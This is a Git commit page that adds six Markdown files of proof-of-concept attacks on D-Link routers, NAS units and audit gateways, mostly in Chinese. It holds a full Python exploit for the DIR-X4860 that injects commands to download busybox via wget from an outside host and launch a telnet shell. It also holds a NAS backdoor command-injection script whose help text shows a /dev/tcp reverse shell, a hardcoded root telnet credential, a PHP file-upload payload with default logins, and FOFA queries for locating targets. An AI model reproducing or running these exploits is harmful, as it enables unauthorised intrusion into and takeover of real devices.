dontian122/POC
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

整理文件

Browse Source
This commit is contained in:
wy876
2024-08-21 15:08:43 +08:00
parent fcad930af3
commit 299ba35f30
1043 changed files with 0 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files

11
D-Link/D-LINK-DIR-845L接口bsc_sms_inbox.php存在信息泄露漏洞.md Normal file
View File

@@ -0,0 +1,11 @@
## D-LINK-DIR-845L接口bsc_sms_inbox.php存在信息泄露漏洞
CVE-2024-33113 是 D-LINK DIR-845L 路由器中的一个漏洞,允许通过 bsc_sms_inbox.php 文件泄露信息。该漏洞是由于对 include() 函数处理不当而引起的,可以通过操纵 $file 变量来利用该漏洞。这使得攻击者可以包含任意 PHP 脚本并可能检索敏感信息,例如路由器的用户名和密码。
## poc
```
http://IP:8080/getcfg.php?a=%0A_POST_SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1
```
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406281801200.png)

308
D-Link/D-LINK-DIR-X4860未授权RCE漏洞.md Normal file
View File

@@ -0,0 +1,308 @@
## D-LINK-DIR-X4860未授权RCE漏洞
## exp
```python
#!/usr/bin/env python
import hmac
import base64
import hashlib
from hashlib import sha256
import time
import math
import logging
import sys
import requests
from urllib3.exceptions import InsecureRequestWarning
# Suppress only the single warning from urllib3 needed.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# You must initialize logging, otherwise you'll not see debug output.
logging.basicConfig()
logging.getLogger().setLevel(logging.DEBUG)
requests_log = logging.getLogger("requests.packages.urllib3")
requests_log.propagate = True
def get_sha256(value):
""" get_sha256 """
hsobj = hashlib.sha256()
hsobj.update(value.encode("utf-8"))
return hsobj.hexdigest().upper()
def get_key_hashlib_sha256(key, value):
"""get_key_hashlib_sha256"""
hsobj = hashlib.sha256(key.encode("utf-8"))
hsobj.update(value.encode("utf-8"))
return hsobj.hexdigest().upper()
def get_hmac_hashlib_sha256(value):
"""get_hmac_hashlib_sha256"""
message = value.encode("utf-8")
return hmac.new(message, digestmod=hashlib.sha256).hexdigest().upper()
def get_hmac_key_hashlib_sha256(key, value):
"""get_hmac_key_hashlib_sha256"""
message = value.encode("utf-8")
return (
hmac.new(key.encode("utf-8"), message, digestmod=hashlib.sha256)
.hexdigest()
.upper()
)
def get_base64_hmac_sha256(key, value):
"""get_base64_hmac_sha256"""
key = key.encode("utf-8")
message = value.encode("utf-8")
sign = base64.b64encode(hmac.new(key, message, digestmod=sha256).digest())
base64sha256 = str(sign, "utf-8")
return base64sha256
def get_md5(value):
"""get_md5"""
hsobj = hashlib.md5()
hsobj.update(value.encode("utf-8"))
return hsobj.hexdigest().upper()
def get_key_md5(key, value):
"""get_key_md5"""
hsobj = hashlib.md5(key.encode("utf-8"))
hsobj.update(value.encode("utf-8"))
return hsobj.hexdigest().upper()
def get_hmac_key_md5(key, value):
"""get_hmac_key_md5"""
message = value.encode("utf-8")
return (
hmac.new(key.encode("utf-8"), message, digestmod=hashlib.md5)
.hexdigest()
.upper()
)
def get_hmac_md5(value):
"""get_hmac_md5"""
message = value.encode("utf-8")
return hmac.new(message, digestmod=hashlib.md5).hexdigest().upper()
def send_http(ip, port, https, headers, data):
"""send_http"""
if https is True:
https = "s"
else:
https = ""
res = requests.post(
url=f"http{https}://{ip}:{port}/HNAP1/",
data=data,
headers=headers,
timeout=1,
verify=False,
)
res_text = res.text
print(f"res_text\n===\n{res.text}\n===\n")
challenge = ""
if "<Challenge>" in res_text:
usb_adv_cgi_id = res_text.split("<Challenge>")
id_value = usb_adv_cgi_id[1].split("</Challenge>")
challenge = id_value[0]
print(f"[+] Challenge = {challenge}")
cookie = ""
if "<Cookie>" in res_text:
usb_adv_cgi_id = res_text.split("<Cookie>")
id_value = usb_adv_cgi_id[1].split("</Cookie>")
cookie = id_value[0]
print(f"[+] Cookie = {cookie}")
public_key = ""
if "<PublicKey>" in res_text:
usb_adv_cgi_id = res_text.split("<PublicKey>")
id_value = usb_adv_cgi_id[1].split("</PublicKey>")
public_key = id_value[0]
print(f"[+] PublicKey = {public_key}")
if "<LoginResult>" in res_text:
usb_adv_cgi_id = res_text.split("<LoginResult>")
id_value = usb_adv_cgi_id[1].split("</LoginResult>")
login_result = id_value[0]
print(f"[+] LoginResult = {login_result}")
return challenge, cookie, public_key, res_text
def login_request(ip, port, https):
"""login_result"""
xml_post = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<Login xmlns="http://purenetworks.com/HNAP1/">
<Action>request</Action>
<Username>Admin</Username>
<PrivateLogin>Username</PrivateLogin>
<login_password></login_password>
<Captcha></Captcha>
</Login>
</soap:Body>
</soap:Envelope>"""
headers = {
"Host": ip,
"X-Requested-With": "XMLHttpRequest",
"SOAPAction": '"http://purenetworks.com/HNAP1/Login"',
"Content-Type": "text/xml; charset=UTF-8",
}
challenge, cookie, public_key, _ = send_http(ip, port, https, headers, xml_post)
if challenge == b"":
print("[-] get Challenge error")
sys.exit(0)
return challenge, cookie, public_key
def login_login(ip, port, https, login_password, hnap_auth, time_now, cookie):
"""login_login"""
xml_post = f"""<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<Login xmlns="http://purenetworks.com/HNAP1/">
<Action>login</Action>
<Username>Admin</Username>
<LoginPassword>{login_password}</LoginPassword>
<Captcha></Captcha>
</Login>
</soap:Body>
</soap:Envelope>"""
headers = {
"Host": ip,
"X-Requested-With": "XMLHttpRequest",
"HNAP_AUTH": f"{hnap_auth} {time_now}",
"SOAPAction": '"http://purenetworks.com/HNAP1/Login"',
"Content-Type": "text/xml; charset=UTF-8",
"Cookie": f"uid={cookie}",
}
send_http(ip, port, https, headers, xml_post)
def get_internet_conn_up_time(ip, port, https, hnap_auth, time_now, cookie):
"""get_internet_conn_up_time"""
xml_post = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetInternetConnUpTime xmlns="http://purenetworks.com/HNAP1/" />
</soap:Body>
</soap:Envelope>"""
headers = {
"Host": ip,
"X-Requested-With": "XMLHttpRequest",
"HNAP_AUTH": f"{hnap_auth} {time_now}",
"SOAPAction": '"http://purenetworks.com/HNAP1/GetInternetConnUpTime"',
"Content-Type": "text/xml; charset=UTF-8",
"Cookie": f"uid={cookie}",
}
_, _, _, res_text = send_http(ip, port, https, headers, xml_post)
return res_text
def set_virtual_server_settings(ip, port, https, hnap_auth, time_now, cookie, cmd):
"""set_virtual_server_settings"""
xml_post = f"""<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<SetVirtualServerSettings xmlns="http://purenetworks.com/HNAP1/">
<VirtualServerList>
<VirtualServerInfo>
<Enabled>true</Enabled>
<VirtualServerDescription>false</VirtualServerDescription>
<ExternalPort>false</ExternalPort>
<InternalPort>9</InternalPort>
<ProtocolType>UDP</ProtocolType>
<ProtocolNumber>UDP</ProtocolNumber>
<LocalIPAddress>{cmd}</LocalIPAddress>
<ScheduleName>false</ScheduleName>
</VirtualServerInfo>
<VirtualServerInfo:0>
<Enabled>true</Enabled>
<VirtualServerDescription>false</VirtualServerDescription>
<ExternalPort>false</ExternalPort>
<InternalPort>9</InternalPort>
<ProtocolType>UDP</ProtocolType>
<ProtocolNumber>UDP</ProtocolNumber>
<LocalIPAddress>{cmd}</LocalIPAddress>
<ScheduleName>false</ScheduleName>
</VirtualServerInfo:0>
<VirtualServerInfo:1>
<Enabled>true</Enabled>
<VirtualServerDescription>false</VirtualServerDescription>
<ExternalPort>false</ExternalPort>
<InternalPort>9</InternalPort>
<ProtocolType>UDP</ProtocolType>
<ProtocolNumber>UDP</ProtocolNumber>
<LocalIPAddress>{cmd}</LocalIPAddress>
<ScheduleName>false</ScheduleName>
</VirtualServerInfo:1>
</VirtualServerList>
</SetVirtualServerSettings>
</soap:Body>
</soap:Envelope>"""
headers = {
"Host": ip,
"X-Requested-With": "XMLHttpRequest",
"HNAP_AUTH": f"{hnap_auth} {time_now}",
"SOAPAction": '"http://purenetworks.com/HNAP1/SetVirtualServerSettings"',
"Content-Type": "text/xml; charset=UTF-8",
"Cookie": f"uid={cookie}",
}
send_http(ip, port, https, headers, xml_post)
def exploit():
""" Exploit """
target_ip = "192.168.4.1"
target_port = 443
target_https = True
print("Login_request")
challenge, cookie, public_key = login_request(target_ip, target_port, target_https)
# print(f"{Challenge=}, {Cookie=}, {PublicKey=}")
dummy_password = "Admin"
private_key = get_hmac_key_md5(public_key + dummy_password, challenge)
login_password = get_hmac_key_md5(private_key, challenge)
print(f"[+] login_password : {login_password}")
soap_namespace2 = "http://purenetworks.com/HNAP1/"
action = "Login"
soap_action = f'"{soap_namespace2}{action}"'
print(f"[+] SOAPAction : {soap_action}")
time_now = int(round(time.time() * 1000))
time_now = math.floor(time_now) % 2000000000000
time_now = "%d" % time_now
print(f"[+] Time : {time_now}")
hnap_auth = get_hmac_key_md5(private_key, time_now + soap_action)
print(f"[+] HNAP_AUTH : {hnap_auth}")
login_login(
target_ip, target_port, target_https, login_password, hnap_auth, time_now, cookie
)
soap_namespace2 = "http://purenetworks.com/HNAP1/"
action = "GetInternetConnUpTime"
soap_action = f'"{soap_namespace2}{action}"'
print(f"[+] SOAPAction : {soap_action}")
time_now = int(round(time.time() * 1000))
time_now = math.floor(time_now) % 2000000000000
time_now = "%d" % time_now
print(f"[+] Time : {time_now}")
hnap_auth = get_hmac_key_md5(private_key, time_now + soap_action)
print(f"[+] HNAP_AUTH : {hnap_auth}")
print("Checking for the vulnerability")
res_text = get_internet_conn_up_time(
target_ip, target_port, target_https, hnap_auth, time_now, cookie
)
if "You need proper authorization to use this resource" in res_text:
print("Target doesn't appear to be vulnerable")
print("Running the RCE")
action = "SetVirtualServerSettings"
soap_action = f'"{soap_namespace2}{action}"'
time_now = int(round(time.time() * 1000))
time_now = math.floor(time_now) % 2000000000000
time_now = "%d" % time_now
hnap_auth = get_hmac_key_md5(private_key, time_now + soap_action)
print(
"Downloading busybox from 'http://192.168.0.100:8000/busybox' as "
"the one on the device isn't good"
)
cmd = "1;wget http://192.168.0.100:8000/busybox -O /tmp/tel;AAAAAAAAAAA"
set_virtual_server_settings(
target_ip, target_port, target_https, hnap_auth, time_now, cookie, cmd
)
action = "SetVirtualServerSettings"
soap_action = f'"{soap_namespace2}{action}"'
time_now = int(round(time.time() * 1000))
time_now = math.floor(time_now) % 2000000000000
time_now = "%d" % time_now
hnap_auth = get_hmac_key_md5(private_key, time_now + soap_action)
print("Renaming busybox to /tmp/telnetd")
cmd = "1;chmod +x /tmp/tel;mv /tmp/tel /tmp/telnetd;AAAAAAAAAAAAAAAAAAAA"
set_virtual_server_settings(
target_ip, target_port, target_https, hnap_auth, time_now, cookie, cmd
)
action = "SetVirtualServerSettings"
soap_action = f'"{soap_namespace2}{action}"'
time_now = int(round(time.time() * 1000))
time_now = math.floor(time_now) % 2000000000000
time_now = "%d" % time_now
hnap_auth = get_hmac_key_md5(private_key, time_now + soap_action)
print("Launching telnetd on port 22228")
cmd = b"1;/tmp/telnetd -p 22228 -l sh;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
set_virtual_server_settings(
target_ip, target_port, target_https, hnap_auth, time_now, cookie, cmd
)
if __name__ == "__main__":
exploit()
```

10
D-Link/D-LINK-Go-RT-AC750 GORTAC750_A1_FW_v101b03存在硬编码漏洞(CVE-2024-22853).md Normal file
View File

@@ -0,0 +1,10 @@
## D-LINK-Go-RT-AC750 GORTAC750_A1_FW_v101b03存在硬编码漏洞(CVE-2024-22853)
D-LINK的Go-RT-AC750 RTAC750_A1_FW_v101b03固件在AlphaNetworks账户中使用了硬编码密码远程攻击者可以通过telnet会话获得root权限。
## poc
```
Alphanetworks:wrgac18_dlob.hans_ac750
```

68
D-Link/D-Link-NAS(CVE-2024-3272&&CVE-2024-3273).md Normal file
View File

@@ -0,0 +1,68 @@
## D-Link-NAS(CVE-2024-3272&&CVE-2024-3273)
## fofa
```
body="Text:In order to access the ShareCenter"
```
## poc
```
GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd==&cmd=15&system=aWQ= HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Linux; Android 8.0.0) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/40.0.874.0 Safari/531.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
```
![1f355c5370398227eca27bbebee72708](https://github.com/wy876/POC/assets/139549762/b0107148-fdd2-461d-aeff-d9c50a2069a8)
## 脚本
```python
# Author: Nick Swink (c0rnbread)
# Original post: https://github.com/netsecfish/dlink
# CVE-2024-3272 + CVE-2024-3273
#
# Description: Backdoor Authentication Bypass + Command Injection
# Affected Devices:
# DNS-320L Version 1.11, Version 1.03.0904.2013, Version 1.01.0702.2013
# DNS-325 Version 1.01
# DNS-327L Version 1.09, Version 1.00.0409.2013
# DNS-340L Version 1.08
import requests, argparse, base64
def main(url, command):
base64_command = base64.b64encode(command.encode('utf-8'))
base64_command = base64_command.decode('utf-8')
uri = f"/cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system={base64_command}"
print("Sending exploit request to endpoint...")
print(url + uri)
r = requests.get(url + uri)
if r.status_code == 200:
print("Status code: 200")
print("Exploit appeared to succeed!")
print(f"\n\tPrinting output: {base64.b64decode(r.text).decode('utf-8')}")
else:
print("Status NOT 200")
print("Exploit Failed. Exiting...")
exit()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Execute arbitrary command on remote system.")
parser.add_argument("url", help="Base URL of the D-Link web interface. e.g., http://example.com")
parser.add_argument("command", help="Command to be executed. e.g., /bin/sh -i >& /dev/tcp/localhost/9999 0>&1")
args = parser.parse_args()
main(args.url, args.command)
```

45
D-Link/D-Link_DAR-8000-10上网行为审计网关任意文件上传漏洞(CVE-2023-5154).md Normal file
View File

@@ -0,0 +1,45 @@
## D-Link_DAR-8000-10上网行为审计网关任意文件上传漏洞(CVE-2023-5154)
## fofa
```
body="DAR-8000-10" && title="D-Link"
```
![image](https://github.com/wy876/POC/assets/139549762/0604d3f1-2325-4ef2-9ba3-cfbe182da07d)
## poc
```
POST /sysmanage/changelogo.php HTTP/1.1
Host:
Cookie: PHPSESSID={登陆获取}
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1) AppleWebKit/531.32.3 (KHTML, like Gecko) Version/4.1 Safari/531.32.3
Content-Type: multipart/form-data; boundary=---------------------------7e62f02f51878
Accept-Encoding: gzip, deflate
Content-Length: 326
Cache-Control: no-cache
Connection: close
-----------------------------7e62f02f51878
Content-Disposition: form-data; name="file_upload"; filename="phpinfo.php"
Content-Type: application/octet-stream
<?php phpinfo()?>
-----------------------------7e62f02f51878
Content-Disposition: form-data; name="mode"
upload
-----------------------------7e62f02f51878--
```
需要登录
```
test/admin@123
admin/admin
```
![fb11b0e63a546ac5943d60d5237d8d77](https://github.com/wy876/POC/assets/139549762/24555069-a601-4295-864b-0ad930ce515e)
文件路径:
`/boot/web/upload/diylogo/phpinfo.php`

34
D-Link/D-Link_DAR-8000操作系统命令注入漏洞(CVE-2023-4542).md Normal file
View File

@@ -0,0 +1,34 @@
## D-Link_DAR-8000操作系统命令注入漏洞(CVE-2023-4542)
D-Link DAR-8000是中国友讯D-Link公司的上网行为审计网关。
D-Link DAR-8000-10版本存在操作系统命令注入漏洞该漏洞源于文件/app/sys1.php的参数id会导致操作系统命令注入。
![c28cb815357f9d7746051855c037606e](https://github.com/wy876/POC/assets/139549762/ce09a764-517f-449d-8296-97a315b590ba)
## fofa
```
body="DAR-8000-10" && title="D-Link"
```
## poc
```
POST /app/sys1.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
cmd=id
```
![532f25d46e25fe6fb6ceff1b97beb88f](https://github.com/wy876/POC/assets/139549762/4ac6df4e-d49c-43ee-83f2-e49ce8f7db3b)